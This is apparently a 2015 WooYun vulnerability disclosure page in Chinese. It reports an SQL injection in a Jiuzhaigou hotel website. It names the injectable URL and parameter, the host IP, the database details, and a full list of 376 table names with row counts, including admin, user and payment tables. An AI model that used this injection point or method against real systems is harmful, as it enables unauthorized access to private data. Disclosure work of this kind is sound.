当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126764

漏洞标题:九寨沟星宇国际大酒店SQL注入

相关厂商:星宇国际大酒店

漏洞作者: 蝶.!

提交时间:2015-07-14 17:23

修复时间:2015-08-28 17:24

公开时间:2015-08-28 17:24

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:3

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

九寨沟星宇国际大酒店SQL注入

详细说明:

注入点: http://www.xingyuhotel.com/english/news.php?id=28&typeid=2
Host IP: 121.42.111.170
Web Server: Apache
Keyword Found: Release
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 4
Valid String Column is 2
Current DB: qdm16058959_db

漏洞证明:

Tables of qdm16058959_db:
table_name	table_rows
------------------------------------------------------------
table count:376
access	0	
adminlog	0	
announcement	0	
attachment	0	
avatar	0	
bbcode	9	
biaotou	88	
calendar_events	0	
cdb_access	0	
cdb_activities	0	
cdb_activityapplies	0	
cdb_adminactions	0	
cdb_admingroups	3	
cdb_adminnotes	0	
cdb_adminsessions	0	
cdb_advertisements	0	
cdb_announcements	0	
cdb_attachments	0	
cdb_attachtypes	0	
cdb_banned	0	
cdb_bbcodes	7	
cdb_blogcaches	0	
cdb_buddys	0	
cdb_creditslog	0	
cdb_crons	11	
cdb_failedlogins	2	
cdb_favorites	0	
cdb_forumfields	1	
cdb_forumlinks	1	
cdb_forums	1	
cdb_medals	10	
cdb_memberfields	1	
cdb_members	1	
cdb_moderators	0	
cdb_modworks	0	
cdb_myposts	0	
cdb_mythreads	111	
cdb_onlinelist	4	
cdb_onlinetime	22	
cdb_orders	0	
cdb_paymentlog	0	
cdb_pluginhooks	0	
cdb_plugins	0	
cdb_pluginvars	0	
cdb_pms	0	
cdb_pmsearchindex	0	
cdb_polloptions	0	
cdb_polls	0	
cdb_posts	0	
cdb_profilefields	0	
cdb_promotions	0	
cdb_pushedthreads	0	
cdb_ranks	5	
cdb_ratelog	0	
cdb_regips	0	
cdb_relatedthreads	0	
cdb_rewardlog	0	
cdb_rsscaches	20	
cdb_searchindex	0	
cdb_sessions	0	
cdb_settings	187	
cdb_smilies	29	
cdb_stats	50	
cdb_statvars	71	
cdb_styles	1	
cdb_stylevars	34	
cdb_subscriptions	0	
cdb_templates	1	
cdb_threads	0	
cdb_threadsmod	0	
cdb_threadtypes	0	
cdb_tradelog	0	
cdb_trades	0	
cdb_usergroups	15	
cdb_validating	0	
cdb_words	0	
chanpin	0	
customavatar	0	
faddress	6	
farea	6	
fbrowser	7	
fipone	9	
fiptwo	30	
fmozilla	28	
forum	3	
forumpermission	0	
frefer	24	
fscreen	8	
fsystem	5	
fvisit	1	
fweburl	6	
gs_ygb	7	
ht_liuyan	2	
ht_yuding	1	
icon	14	
infolist	1	
ipinfo	0	
ipscope	16	
jituan_access	0	
jituan_adminactions	0	
jituan_admingroups	3	
jituan_adminnotes	0	
jituan_adminsessions	1	
jituan_advertisements	0	
jituan_announcements	0	
jituan_attachments	0	
jituan_attachtypes	0	
jituan_banned	0	
jituan_bbcodes	7	
jituan_blogcaches	0	
jituan_buddys	0	
jituan_creditslog	0	
jituan_crons	8	
jituan_failedlogins	1	
jituan_favorites	0	
jituan_forumfields	1	
jituan_forumlinks	1	
jituan_forums	1	
jituan_medals	10	
jituan_memberfields	1	
jituan_members	1	
jituan_moderators	0	
jituan_modworks	0	
jituan_onlinelist	4	
jituan_onlinetime	1	
jituan_orders	0	
jituan_paymentlog	0	
jituan_pluginhooks	0	
jituan_plugins	0	
jituan_pluginvars	0	
jituan_pms	0	
jituan_pmsearchindex	0	
jituan_polls	0	
jituan_posts	0	
jituan_profilefields	0	
jituan_promotions	0	
jituan_ranks	5	
jituan_ratelog	0	
jituan_regips	0	
jituan_relatedthreads	0	
jituan_rsscaches	0	
jituan_searchindex	0	
jituan_sessions	0	
jituan_settings	159	
jituan_smilies	27	
jituan_stats	50	
jituan_statvars	0	
jituan_styles	1	
jituan_stylevars	27	
jituan_subscriptions	0	
jituan_templates	1	
jituan_threads	0	
jituan_threadsmod	0	
jituan_threadtypes	0	
jituan_usergroups	15	
jituan_validating	0	
jituan_words	0	
lanmu	55	
lanmuname	19	
moderator	0	
net_search_fs	0	
new_dk_jianjie	1	
new_dk_jianjie_en	1	
new_dk_leibie	1	
new_dk_news	1	
new_dk_news_en	1	
new_dk_yeji	1	
new_dk_yeji_en	1	
new_dk_zhanshi	9	
new_fazhan	1	
new_hty_about	1	
new_hty_changshi	28	
new_hty_changshi_en	1	
new_hty_jingdian	8	
new_hty_notice	1	
new_hty_shengnei	5	
new_hty_shengwai	0	
new_hty_xibu	0	
new_hty_zt	0	
new_hty_zt_leibie	0	
new_hy_jianjie	2	
new_hy_jianjie_en	1	
new_hy_qita	4	
new_hy_sc	20	
new_hy_sc_jianjie	1	
new_hy_sc_jianjie_en	1	
new_jd_huodong	1	
new_jd_news	2	
new_jd_service	2	
new_jd_service_en	2	
new_jd_shebei	3	
new_jd_shebei_en	3	
new_jd_wenhua	3	
new_jd_wenhua_en	3	
new_jd_wenhuahj	1	
new_jianjie	1	
new_news	1	
new_news_en	1	
new_notice	1	
new_notice_en	1	
new_qy_wenhua	1	
new_qy_zhongzhi	1	
new_zonghe	6	
new_zonghe_en	6	
news	225	
poll	0	
pollvote	0	
post	32	
privatemessage	0	
profilefield	4	
replacement	45	
replacementset	1	
rh_auth	5	
search	23	
searchindex	3093	
session	13	
setting	169	
settinggroup	31	
smilie	11	
statday	22	
statmonth	14	
statweek	2	
statyear	9	
style	1	
subscribeforum	1	
subscribethread	115	
table_name	164	
table_name_other	30	
template	466	
templateset	1	
test	0	
thread	30	
threadrate	0	
type	4	
user	54	
userfield	165	
usergroup	7	
users	1	
usertitle	10	
visitor	30	
word	1923	
xyhtl_bg_interface	292	
xyhtl_bg_interface_other	39	
xyhtl_bg_menu	49	
xyhtl_bg_search_form	0	
xyhtl_bg_user	3	
xyhtl_bg_usergroup	2	
xyhtl_catering_info	73	
xyhtl_catering_overview	1	
xyhtl_catering_type	5	
xyhtl_conference_info	2	
xyhtl_contact_info	1	
xyhtl_en_catering_info	73	
xyhtl_en_catering_overview	1	
xyhtl_en_catering_type	5	
xyhtl_en_conference_info	2	
xyhtl_en_contact_info	1	
xyhtl_en_entertainment_info	7	
xyhtl_en_guestroom_info	4	
xyhtl_en_guestroom_overview	1	
xyhtl_en_hotel_info	5	
xyhtl_en_message_info	13	
xyhtl_en_news_info	36	
xyhtl_en_news_type	3	
xyhtl_en_qq_info	3	
xyhtl_en_qq_type	3	
xyhtl_en_recruitment_forjob	6	
xyhtl_en_recruitment_forsave	4	
xyhtl_en_recruitment_job	18	
xyhtl_en_recruitment_policy	1	
xyhtl_entertainment_info	7	
xyhtl_guestroom_info	6	
xyhtl_guestroom_overview	1	
xyhtl_hotel_info	5	
xyhtl_message_info	10	
xyhtl_news_info	77	
xyhtl_news_type	5	
xyhtl_pay	45	
xyhtl_pay_user	30	
xyhtl_qq_info	2	
xyhtl_qq_type	1	
xyhtl_recruitment_forjob	40	
xyhtl_recruitment_forsave	15	
xyhtl_recruitment_job	18	
xyhtl_recruitment_policy	1	
xyhtl_room	294	
xyjd_gs_ygb	5	
xyjd_jdkj_dinggou	4	
xyjd_jdkj_fjlx	8	
xyjd_jdkj_jdjs	2	
xyjd_jdkj_kfjs	2	
xyjd_jdkj_link	6	
xyjd_jdkj_liuyan	35	
xyjd_jdkj_lxfs	2	
xyjd_jdkj_ptss	5	
xyjd_jituan_dczhuti	4	
xyjd_jituan_diaocha	9	
xyjd_jituan_download	2	
xyjd_jituan_fzlc	2	
xyjd_jituan_guanggao	4	
xyjd_jituan_jtjs	2	
xyjd_jituan_ldzc	2	
xyjd_jituan_link	11	
xyjd_jituan_liuyan	8	
xyjd_jituan_lxwm	3	
xyjd_jituan_news	10	
xyjd_jituan_newslb	6	
xyjd_jituan_qyry	2	
xyjd_jituan_qywhjs	2	
xyjd_jituan_qywhxx	4	
xyjd_jituan_ypzw	14	
xyjd_jituan_zwfb	3	
xyjd_jituan_zzjg	2	
xyjd_kangdi_cpleibie	2	
xyjd_kangdi_dinggou	2	
xyjd_kangdi_gsjs	2	
xyjd_kangdi_gsqj	8	
xyjd_kangdi_gsyj	2	
xyjd_kangdi_link	2	
xyjd_kangdi_liuyan	2841	
xyjd_kangdi_lxwm	2	
xyjd_kangdi_news	2	
xyjd_kangdi_newslb	4	
xyjd_kangdi_product	12	
xyjd_kangdi_productlb	8	
xyjd_kangdi_xsnet	2	
xyjd_lanmu	232	
xyjd_lvxingshe_news	2	
xyjd_net_cdjs	2	
xyjd_net_cpname	10	
xyjd_net_cpxl	5	
xyjd_net_cygs	2	
xyjd_net_cyhj	2	
xyjd_net_cyjs	2	
xyjd_net_dlhj	2	
xyjd_net_dtbz	0	
xyjd_net_dtds	2	
xyjd_net_fangjian	9	
xyjd_net_fjgpjg	8	
xyjd_net_fjjg	8	
xyjd_net_fjjs	8	
xyjd_net_fjptss	8	
xyjd_net_fjznxt	8	
xyjd_net_fwln	2	
xyjd_net_fwxmjs	2	
xyjd_net_fwxmtk	7	
xyjd_net_gnjs	2	
xyjd_net_jcgw	2	
xyjd_net_jdbz	2	
xyjd_net_jdgk	2	
xyjd_net_jdpic	2	
xyjd_net_jgrl	2	
xyjd_net_jqwy	2	
xyjd_net_jyzz	2	
xyjd_net_khjj	2	
xyjd_net_link	5	
xyjd_net_lxwm	2	
xyjd_net_news	32	
xyjd_net_newslb	7	
xyjd_net_pmt	2	
xyjd_net_ptss	2	
xyjd_net_search_fs	0	
xyjd_net_tscy	3	
xyjd_net_wsyd	0	
xyjd_net_ypzw	27	
xyjd_net_zcgs	1	
xyjd_net_zgfljs	9	
xyjd_net_zpjj	2	
xyjd_net_zwfb	21	
xyjd_net_zzjg	2	
xyjd_pay	13	
xyjd_pay_user	34	
xyjd_rh_auth	5	
xyjd_room	61	
xyjd_table_name	503	
xyjd_table_name_other	44

修复方案:

版权声明:转载请注明来源 蝶.!@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论